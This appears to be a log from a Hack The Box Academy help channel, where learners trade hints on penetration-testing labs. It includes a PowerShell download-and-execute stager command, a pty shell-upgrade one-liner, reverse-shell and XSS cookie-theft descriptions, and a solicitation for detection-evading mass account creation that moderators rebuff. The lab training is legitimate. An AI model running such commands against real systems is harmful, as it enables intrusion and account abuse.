idk if someone had the same error or if is problem of the lab, please helpppp

Need help with "bundle install" from the module "DNS tunneling with Dnscat2".
I get a error when installing so then i cannot connect from windows to the dnscat2 server.
Module link: https://academy.hackthebox.com/module/158/section/1436

Iv'e been over an hour trying to solve it with chatgpt but nothing

gem install sha3 maybe?

use sudo

i get the same error

Yeah honestly had the same issue but can't recall how to fix it, nor do I have any notes 😅

try yeeting that error into chatGPT

it's what ive been doing and it is driving me nuts

i'll just give it another try

Hello everyone, i have been solving Offshore Prolab. Pwned all machines. But not able to get one last flag. We can do better than this. Can some one help me?

you need to specify the user you're trying to log in with :)

I figured it

bro where do i have to practice on my own vm machines or on the htb web ?

htb academy has labs in most of the sections to practice what they teach

Marcie - can I dm you with a question related to content? My memory is not serving well

you can use your own vm or the in-browser pwnbox

can i use the open ai for questions or commands where i got the issues ?

tbh my brain isn't the best atm

yes

no problem 🙂

i wouldn't trust AI to dig a square hole; relying too much on AI will only be to your detriment rather than as a tool

agreed

Hello! I'm having a lot of trouble with the "Skills Assessment" section of the Cross-Site Scripting module. I don't want to give away anything here, but I'm pretty sure I've found the vulnerable field and the right kind of payload, but it's very sporadic. For example, sometimes a test payload will work, and then I'll change it to a similar payload to exfiltrate the info that I want, that WON'T work, and then when I test the previous payload again, it won't work either, and I won't be able to get it to work with anything for a while, until some later test works again.

Also, I've noticed that after resetting the machine, sometimes the previous test payload won't work, but a different one will, but again it's really finicky.

I've tried resetting the machine multiple times, and I've also tried from both my own Kali VM over the VPN and from the Pwnbox, but I'm running into similar issues in both cases.

Is there anyone here who can help me with this? Maybe over DM so we don't give away any spoilers?

Does some1 here heard full cube talks in 16th May? I saw some1 asked if any SAP PT will be in academy and IppSec marked it as answered but I can't find the answer in the Talk 😮

this wouldn't be the channel to look for anyway; i believe when the cube talks episodes drop they're in #📣-announcements

Do you know mayber? if any plans for sap pt in the academy?

i'm not staff so i wouldn't know; if it's marked as "answered" it means it was addressed during the talk. not necessarily written down anywhere

Typical. I just posted this, tried my payload a few more times, and it finally worked. Disregard 🙂

(But yeah, for anyone else working on this one, it seems pretty finicky)

Hey everyone,I’m Phoebe, new around here and really looking forward to getting to know you all. I make my living online. My DMs are always open😊

this isn't #general read and follow #welcome to access it

Question on subscription status - if I cancel my subscription do I still maintain the access to all the unlocked modules? Do I get the updates on the unlocked modules for free or this will be extra cubes? And question about CPTS exam - on my last try I miserably failed on both attempts. Is there a different version of the test every time I get a voucher or there is a random pool assigned to each attempt? Asked to know if I will have a frustrating experience with the same wall I've been knocking at for over a week or it will be a slightly different list of tasks?

wait I just completed this module today,

You retain access to the modules you completed

[At this point in time] there's only one version of the exam

Hello colleagues I am stuck in the skills assessment of file upload attacks I have the upload.php directory that I have decoded in base64 my question is how I do to load it in the upload.php since I have the code with the validations that touches fuzzear but I do not know how to use the directory to load the script and it runs

After you upload your payload, you need to figure out if the upload.php is doing anything to the file to change it

And the directory indicated in upload.php is something that has intervention

php -r is helpful in running some local php code if you need some inspiration, one of the lines is important

Or some reason it will only let me talk in here
I can’t talk in general (sorry Ik this is not about modules I just don’t know where else to say this since it won’t let me)

There's instructions at the bottom of #welcome, it's a list of instructions

Oooh I see
Thank you I didn’t realize there were instructions in the welcome channel

Hi,
im unable to access splunk apps in the Detecting Windows Attacks with Splunk module

those sections can take a few minutes for the web app to fully load

so give it a few minutes and refresh

The truth is I'm kind of lost because I was reviewing the code and it performs validations and if it passes all the filters it shows the directory

it doesn't just perform validations

look closer at the top of the code

still on the same instance, doesnt work even after i refresh it

php wrappers

nothing to do with wrappers; pay attention to what the upload.php does

also cant access the support bubble on the bottom right, tried different browsers with adblocker/trackers disabled

a friend also tried it, and he faces the same issue

rename before storing with date

it appends the date to the beginning, if you run the LOC with php -r (substitute the filename with 'test')

So we would be talking about injections in file name

not injections really

it's just how the file will show up after you successfully uploaded

Hi, Im looking to set up mass account creation (on mobile) and need someone to set this up technically safe so that we dont trigger any detections and keep trustscore high.

Need someone that can point me into the right direction of finding the best suitable person for this. Compensating well - 6 fig/year package. Happy to pay for any little info also. Thanks in advance

Hello. I'm doing the nibbles box (Through the getting started module) and I'm backtracking through the steps multiple times, but for the last shell (The root one I'm tyring to escalate to) im just getting a "#" to input stuff instead of an actual shell. The couple of of steps before I appended the monitor.sh file and then did chmod +x monitor.sh and then ran sudo ./monitor.sh with a nc listener up to catch it.

But it's not giving me a shell back.

Marking answered happens if we just ignore the question. In this case I hid it because we don't about our roadmap of what modules you can expect in the future.

when you get a # before your prompt, congrats you're root

It was only spitting back my commands... so if tried ls it returned ls... or pwd it returned pwd... it doesn't actually do anything

python3 -c "import pty; pty.spawn('/bin/sh')"

Thank you. I'll need to get the shell back because after I thought it wasn't working i may have closed the session so I need to do the steps again 😅. I feel like an idiot

Hey guys, I'm working on the Windows Privilege Escalation module, specifically in the "Interacting with Users" section, and I'm stuck on capturing the NTLM hash of SCCM_SVC. Can anyone give me a hint?

@fathom pendant it just returned "python3 -c "import pty; pty.spawn..."... if i try ls or pwd like before, it does the same thing. It's just sending me back what ever text i type into it.

Really poor explanations on the exploiting thick applications module

I’m so happy the lab targets seem to be working a lot better over the VPN today lol. Yesterday was such a struggle!

I understand what the code does but I don't understand how to set up the payload so it can be executed.

you're overcomplicating things; you need to get a valid php uploaded, and then just access it via the way it's mutated and the file location

i.e. http://web.site:port/some/location/prepend_file.php

you'll need to use a combination of techniques showcased

Anyone that got issues with deploying the lab targets now? Nothing happens, says deploying for 20-25 minutes now..

I know that the file is passed with a date so that it is not repeated and it is uploaded to the directory until then, which is normal. The complicated thing is that when I upload, evading the filters, I get the move Permanently 301

Im struggling with the using web proxies modual specifically the repeating requests part. I have both flags but it still says its wrong when I submit them. Anyone have a soulution

hi everyone

hi for question 3 of the skills assessment for pivoting, tunneling, and port forwarding module, I am trying to ssh into the server. I know the private key I found works because I used it previously and I can ping the server and reach it from port 80 and 22. But the connection always times out or does not let me ssh into it:

┌──(kali㉿kali)-[~]
└─$ ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:bf:6a:93:1a  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 74 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::662f:46a4:46dd:e2ff  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:6e:13:6e  txqueuelen 1000  (Ethernet)
        RX packets 178571  bytes 112816511 (107.5 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 218227  bytes 225873477 (215.4 MiB)
        TX errors 0  dropped 84 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2879  bytes 639711 (624.7 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2879  bytes 639711 (624.7 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1600
        inet 10.10.14.196  netmask 255.255.254.0  destination 10.10.14.196
        inet6 fe80::a80d:9457:2cfe:b291  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef:2::10c2  prefixlen 64  scopeid 0x0<global>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 27  bytes 10433 (10.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 48  bytes 14797 (14.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ ls
backupscript.exe  chisel_1.10.1_linux_amd64.deb  dnscat2             Documents  go   id_rsa_web_admin  Pictures    Public  Templates             ubuntu@10.129.44.156
chisel            Desktop                        dnscat2-powershell  Downloads  HTB  Music             ptunnel-ng  rpivot  ubuntu@10.129.129.10  Videos
                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ rm id_rsa_web_admin         
                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa webadmin@10.129.248.138 
^C

Eventually if I don't ^C it it times out and disconnects automatically.

can someone help me with this?

if I try to ssh in on port 80 it times out

but I can access the web shell

can someone DM me I'm scared I will reveal too much if we chat here?

that's not what this server is for. its a cybersecurity server, pentesting learning server. we are not your personal army.

Oh sorry

please do not ask anyone to do illegal activity again

Alr

wait problem solved I'm sshd in

ok I am doing this section quite well

port 80?

unless i'm blind, you do not seem to have an id_rsa in your working directory

I know I already fixed that

because the port is technically open but I'm not doing that

finally connected via ssh now kind of using proxychains to forward nmap requests to the network

we'll see how my nmap scan goes

sent it through port 9050

or at least proxychained it through that

we'll see what happens. I think this will hopefully yield good results.

Man can I dm you tommorw? if I face any error because I will also be starting the assessment tommorw

sure I don't know if I will finish by tomorrow honestly but I'll do my best to help

you may need to reconfigure proxychains

Thanks 👍

I will I am currently on ICMP tunneling with socks

hello, I am stuck with the 3rd question of the "Attacking Active Directory & NTDS.dit
" module "https://academy.hackthebox.com/module/147/section/1326", I am attacking the target with netexec, using the fasttrack dictionary, and I've created the user list file, and with the convention for the username gives the hint, but I am not getting success, any clue?

ok ya I had some trouble with that one briefly

I just started it out let's hope I don't face any

you can do it

sometimes its difficult but getting through that difficulty is how you learn to hack

Yep my biggest helper is chat gpt in solving errors and also there are a lot of great people here

you have chatgpt, google, and the HTB Discord

no reason you should need to ask elsewhere

yes, but guidance from a experienced person >> Help from module section

you can get that from HTB Discord

that's the thing. there's experienced people on here that can help with HTB better than anywhere else

there's no reason to look on HF

yea I have solved many problems with the help me people from HTB-discord

I think that if your gonna look on hacking forums for stuff it should be to network with other hackers but as for actually learning, HTB Discord, THM Discord, PentesterLab Discord, or the Discord for whatever learning platform you use is the best possible thing

I'm in the middle of nmapping the target network with proxychains because I'm hoping I can solve question 3 of the skills assessment that way

we'll see if I'm right. if not I'll ask for help on here

Found a cool YouTube channel all about tech, programming & digital stuff — super fun & helpful!

Wanna level up your skills? 🚀
Check it out here:

http://youtube.com/@thedigitalbeni?sub_confirmation=1

Drop your fav video if you watch it!

Thanks for the advice man and best of luck for further flags

You have a dump file from the Domain containing the NTLM hashes of accounts. You can generate a wordlist from this dump file and run the captured NetNTLMv2 Hash against this wordlist using Hashcat.

Hello,

I'm having trouble accessing the Splunk exercise. When I run nmap, port 8000 is listed, and it appears that Splunk is running. However, when I try to access it in the browser at http://10.129.207.255:8000/, I receive the message: "The connection was reset." As a result, I'm unable to complete the related exercises.

Could someone please give me a hand?
Module: Attacking Common Applications
Page: Splunk - Discovery & Enumeration, Attacking Splunk

PD: I tried reseting the target and Pwnbox twice

Is it possible that you need to add a host name inside the "/etc/hosts"?

If you are not supposed do add a host name then I think you should connect to the ip using netcat

anyone know how to find the commonName of a ip?

using nmap

You mean the dns records? Or the services running with that ip?

here

is the question

What is the commonName that the SSL certificate provides? (Format: example.com)

What you are looking for is a ssl certificate scan on an ip.

There is a script for scanning ssl certificates using nmap

what is that script?

So when you scan with nmap, you can choose special features. And the feature to scan ssl is a script called "--script ssl-cert"

If you use this feature (script) to scan it will give you all the info you need including CommonName

thank you

I was reporting a ticket but by mistake submited it in the middle of writing and i cant update text on it so i will send it here:

Ticket ID
#7606273

Module's Link
https://academy.hackthebox.com/module/158/section/1441

Issue Description
Submit the contents of C:\Flag.txt located on the Domain Controller.
spoiler below
VVVV
||seems that last flag can be found tru vrank(172.16.6.25) on file explorer im not sure if thats a some misconfig was it meant to exploit DC to gin that flag||

Hi everyone! I am kinda of stuck in the module after completing everything in the steps

On the Cross-Site Scripting Module - session Hijacking, I was able to listen to the server even get the cookie reponse but whe I added in devtool and refresh it does not seem to work in the 'http://exercise_server_IP/hijaking/login.php'

When you resend the request with the new cookie, does it revert to the old one? Or stays?

After running it a couple of times I notice the cookie does not change. So probably the old one stayed

Its giving me 200 codes when receiving the cookie as well

After you add the cookie you should refresh the browser page using this sign on the top left 🔄

I did but when I do still showing the login page

Dm screenshots

Yo do y'all think pentester is a good career option at the moment ?
Like i really like it but people say that there are no entry level jobs,and just no too oversaturated
Also i think it will basically take too long to learn like man i gotta eat smth i don't got 3-4 years to learn it,is it possible to learn it in like idk 1-2 years ?İ doubt it
What do y'all think,can i make it in a year or two?

Pentesting isn't entry and cyber isn't entry

Something like help desk is entry

Oh

It'll take way longer than a year or 2 to get your foot in the door for cyber in my opinion if you're starting with nothing

Damn really ?:(

Thanks for your opinion man

You can work an IT enrty level job and keep learning pen testing.

Its going to take some time and discipline, now is when I am starting to get more hands on. Build a portfolio doing CTF and bug bounty programs.

It's better to start now than not starting at all

Well my plan B was to get into QA automation sk i guess I'll do that

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@dusk frost

Thanks for advices y'all

Most importantly don't give up when you feel stuck!

İ hope i make it one day to pentesting 🙏

Thats my goal too

@mellow rapids

@valid rune Not what this server is about.

No sir

Isn’t it hacking

It's about the various Hack The Box's platforms.

Oh

also read the #rules and #welcome, don't randomly ping people.

But can you show me a bot

If there is a bot to hack someone

Or show me how to get on a platform

No. This isn't the server for you it sounds like. Stop asking people to do illegal things.

The hacker destroyed my friends entire server

But

The goal is not to hack someone back, that is not ethical. It to make the web and the world a safer place.

I guess since this isn’t

Don't care. Also not the channel for this type of discussion.

Ight then I guess this isn’t my server

Bye and sorry for wasting your time

@cloud urchin Do you mind looking into the question I asked earlier on a module please?

Can't help right now sorry

No problem! Thank you

xfreerdp wont let me connect it keeps timing out

Is the name and value correct?

Try increasing the timeout

I did also, i do not have the rockyou.txt file where can i get this

found it dw

The value is correct and tried different ones just to confirm. Also reset the pwn VM and the server

I apologize the delay still working with this

Module: Sliver

Section: Persistence

iex(new-object net.webclient).downloadString('http://10.10.14.62:8088/stager.txt')" | iconv -t UTF-16LE | base64 -w 0 how is the stager.txt created ? is it just a PS1 beacon payload ?

I was able to use a python script with the request module to be able to get the flag. Through firefox it was not refreshing. Thank you for the help!

Hi! Is this where we can talk about modules we are stuck on in HTB academy?

yes, note the module & section you're working on and you can just ask a Q and see if anyone has advice. Revealing content over tier 0 is discouraged (I think it's tier 0, I'll see if I can double check that)

not only discouraged; against ToS

as it's spoiling paid content

right irght I was using soft language

tier 0 content is considered "free" content since you get the cube cost back

@fathom pendant ToS?

Terms of Service

Thank you! Ok I am going through the Pen Tester path, so not tier 0. I am glad to know there is a community of friendly ethical hackers for us to help each other out if we can 💖

some of the modules in the path are tier 0; but you can ask general questions like
Some module - Some Section
I'm stuck at performing the attack mentioned/it's taking forever for this attack to run, is that normal

Thanks!

Just so I know, how do you know if its tier 0? Does it say somewhere in the module?

before you start the module it has the tier on it

also: don't expect direct answers to your questions, expect vague but useful hints to get you thinking in the right direction

I was doing CPTS starting module and stuck in Nibbles machine . I could not access to Nibbles machine . It is telling that IP address 10.10.10.75 and still could not ping and nmap successfully . I also have a VIP member for lab practice . Either way I was not successful . Could someone please help me to solve the problem ?

Are you using the VIP VPN? Academy is a different platform and you need to use the Academy VPN.

Yes I tried . But hosts are unreachable

In GUI , everything showing is green color

@cloud urchin When I tried from Academy I tried Academy VPN and from VIP I tried from VIP VPN . Both are failed

O

If there is any server maintenance or Unavailable server, They put the warning/notice banner on to half of my screen which do not let me focus on the actual module. Does anyone have a way to get rid of those banners after watching them for once. Really annoying...

Has anyone here done the last question on using crack skills assessment

I have found the very last exploit, however when I am testing against all seven usernames that I have discovered it doesn’t capture the hash

I'm stuck on attacking common applications, skills assement 2. This is probably really dumb but its on the question What is the name of the public GitLab project?

I can't login or do anything to the gitlab project

Good morning! Has anyone had this issue and successfully solved it? When I RDP to a machine, the keyboard layout is different than mine. For example, if I have to type commands and use special characters like /-(): etc., it's horrible because they're in a different place than on my keyboard. I cannot successfully change the keyboard layout to my country in the machine's settings. Also I haven't found any advice in google. It's literally a nightmare and a red flag for me if I have to RDP in and type commands ....

wassup
htb-student@nix03:~/.cache$ Read from remote host 10.129.255.195: Connection reset by peer
Connection to 10.129.255.195 closed.
client_loop: send disconnect: Broken pipe

why do i keep getting this

like im locked in '

This is where questions go to die lol

english ?

unfortunately

what is using crack skills assement actually named btw lmao

Have you done it?

I'm just working on cpts, thats all

I’m not looking to talk about it I’m looking to get help on the last question 😂

yeah sorry i havent done it, i just meant ive only done modules in cpts so far

i just did it. still need help?

Using crackmapexec skills assessment. If anyone ever needs help with this, do not hesitate to reach out this was incredibly difficult. I just finished it

im all good now, thanks though! i was being super dumb and didnt update my hosts file. i have rev shell and now im looking for the flag

ok if u need help lemme know : )

can u check dm?

Hello everyone,hows going? I am new here

Enthusiastic in learning ethical hacking,need you guys help

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Submit Flag

Submit root flag؟

Just bought the Cubes for the pentesting module 👀 GL me

good luck

@silent prawn feel free to dm me, deleted your message for not spoiling 🙂

dm me with what you have 😄

thank you very much, I will send you a DM

sorry to ask again, but still stuck, an I in the right direction or maybe I'am completely wrong? thanks

am i trolling or is the linux privesc page 9 on sudo abuse not accepting the right answer? It should be ||/usr/bin/openssl|| and the solutions says that too but it wont accept it

htb-student@nix03:~$ Read from remote host 10.129.255.195: Connection reset by peer
Connection to 10.129.255.195 closed.
client_loop: send disconnect: Broken pipe

htb-student@nix03:~$ Read from remote host 10.129.255.195: Connection reset by peer
Connection to 10.129.255.195 closed.
client_loop: send disconnect: Broken pipe

any help ?

very helpful community

im enjoying this help they giving

omg hackthebox community really helpful im so happy

@rustic sage no need to spam in all the channels

be patient, there's people who are working

I have just completed the Android Fundamentals Module. One of the last questions asked about finding the UID of the directory for com.android.settings. I got the answer cause I have a rooted phone and I was able to do su inside adb shell. Is the question not doable for those without a rooted device?

can u help me out though

with what ?

htb-student@nix03:~/snap$ cd lRead from remote host 10.129.255.195: Connection reset by peer
Connection to 10.129.255.195 closed.
client_loop: send disconnect: Broken pipe

There's no need to join this server with 2 accounts if you get muted lol

and no I can not help you

please contact support

its been like this for 70 days

I can't help you, maybe you're using a wrong protocol or try switching your VPN to TCP

its okay ill try using the pwnbox

I can't help with the technical stuff, I am just a Discord mod

Need help with "bundle install" from the module "DNS tunneling with Dnscat2".
I get a error when installing so then i cannot connect from windows to the dnscat2 server.
Module link: https://academy.hackthebox.com/module/158/section/1436

Hello

Thank you very much for the push in the right direction. I managed to crack a few of the dumps passwords, 3 or 4 with rockyou but still haven't figured out the rest just yet. I have everything else completed in the module so will keep chipping away at it 🙂

You have already got the answer

Still need help?

You need to create a NTLM hash wordlist, then attempt to crack the NetNTLMv2 using this wordlist. Hashcat has the possibility of using the NTLM hash instead of a password for the cracking.

that what i have been reading so far.. :/

There are 6 subdomains in the brackets, you stated 7 subdomains

The one extra is the answer

@gusty cape please refrain from giving direct answers/spoiling :))))))))

no waay maan i typed every answer and all incorrect

wait ill try again

👀

the q already stated 7 subdomains..

Sorry 7 you gave 8

Thank you, I will get a chance to spend some time at this again this afternoon. The kids will have me busy now for the next few hours. Ps: I love the rabbit holes the chat bots take me down when stuck, holy moly. Cheers.

oh sh** i got it @thorny kraken

no way man, wasted 2 hours of my life and it was infront of me!!

Hahaha if you learnt something, its not a waste

true that ❤️ thanks a lot @thorny kraken

If you still can’t understand the concept, you can DM later and I can explain it.

need help with the "SOCKS5 Tunneling with Chisel" module.
I can't get chisel working on the pivot host. How do I know what version I have to use for it to be compatible on both my attack host and target??
Module link: https://academy.hackthebox.com/module/158/section/1437

Hello, HTB community 🙂
I'm looking to buy a gift for my older brother, since he is very interested in cybersecurity. One of the ideas I got was to buy him an Academy gift card. My problem is that I have no idea how this works. From what I have seen, the certifications are all around 500$, and that is way more than my budget can cover. In reality, I'm curious about what good can he get from a 50$ gift card, and is it worth it?
Thanks for taking the time, I really appreciate it!

the certs aren't $500; that's the price of the annual subscription. The cert itself is $210, but you have to complete the course which can be done on far less than $500

never mind, had to comment out the socks4 in /etc/proxychains.conf and only leave the socks5 one

Footprinting :IPMI Footprinting

Stuck on last question for a day now, essentially I can't figure out what format hashcat wants from me as I swear I have been doing everything correctly, I've tried a million ways to format the salted hash.
keeps returning this when running hashcat command listed in module along with the salted hash I received.

Hashfile 'ipmi.txt' on line 1 (user:...(cantleakthis): Token length exception
* Token length exception: 1/1 hashes
  This error happens if the wrong hash type is specified, if the hashes are
  malformed, or if input is otherwise not as expected (for example, if the
  --username option is used but no username is present)

Hello

hi

Try adding --username or removing the user: portion

Dude you

1. didn't "find" the channel, it's your channel
2. This isn't the channel for self promotion

What's the problem if support ppl

It's completely unrelated to this channel

Read #welcome and #rules

Ok sry for doing that

okay, but isn't user required for HMAC-SHA1 or am i fine to remove it?

Are you sure you're using the right mode? There's an ipmi mode for hashcat

It's given in the reading

yeah I was using 7300

so your good to remove the user portion for 7300/IPMI2 SHA1?

Then try method one with --username

If that doesn't work, then try method 2

i think ill also try running hashcat locally since i can just copy the hashcat file over to my pc, it will speed it up probably

--username didnt work when i was testing it

Token exception means that it's not recognized for the mode you're trying

yeah I mean it told me that, the thing is like a hundred different times i tried to look it up and every time i did it told me the user portion is meant to be there

Also please tell me you aren't also trying to use the mask method

oh yeahh i were

is that not a good idea?

its frustrating because that's what is in the module

On that module, i also had issues but after i removed the username from it, it worked

I wonder if i was using the wrong mode though

how long did it take to crack the hash?

I think I might just try using a dictionary attack

rockyou wordlist

oh

found it

• Runtime...: 1 sec

@fathom pendant Thank you :)

It tells you the mask method is for a specific vendor ipmi implementation, not that it's the generic for every instance if you read it more closely

I did read that however, I had the assumption that the ipmi vendor implementation was the one being used in the module for lack of better words

what could I do to identify what ipmi vendor is being used on a target machine?

I believe if you scan it should tell you based on version info

nmap?

Ye, i think the msf exploit also tells you, I could be wrong

gotcha, thank you for your assistance! super appreciated.

Step 0. Enumerate :)

Hello buddy